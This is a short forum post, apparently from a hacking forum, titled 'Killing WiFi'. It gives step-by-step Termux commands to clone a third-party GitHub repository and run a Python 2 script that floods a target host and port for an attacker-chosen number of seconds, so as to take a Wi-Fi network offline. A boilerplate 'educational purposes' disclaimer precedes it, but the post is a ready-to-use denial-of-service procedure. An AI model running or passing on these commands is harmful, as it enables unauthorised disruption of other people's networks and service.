Killing WiFi

Mutt

Professional
Messages
1,167
Reaction score
835
Points
113
This material is provided for educational purposes only and was created as part of the study of information security. The author did not publish material for malicious purposes. If someone uses the information for personal gain, then the author is not responsible for any harm or damage caused.

Today we will consider a tool that is able to chop off a Wi-Fi network.

First you need to connect to the Wi-Fi network that you want to put

1. Install Termux

2. We register commands in the console:
Code:
pkg update
pkg upgrade
pkg install python
pkg install python2
pkg install git
git clone https://github.com/artem-cell/wifi-dosser
cd wifi-dosser
pip2 install requests mechanize
python2 wifi-ddoser.py
python2 wifi-ddoser.py example.com 80 3 999999999999

The last line after the ports is the time in seconds. You can specify the amount you want, it all depends on your intentions.

P.S.: To stop ddos, just restart your router.
 
Top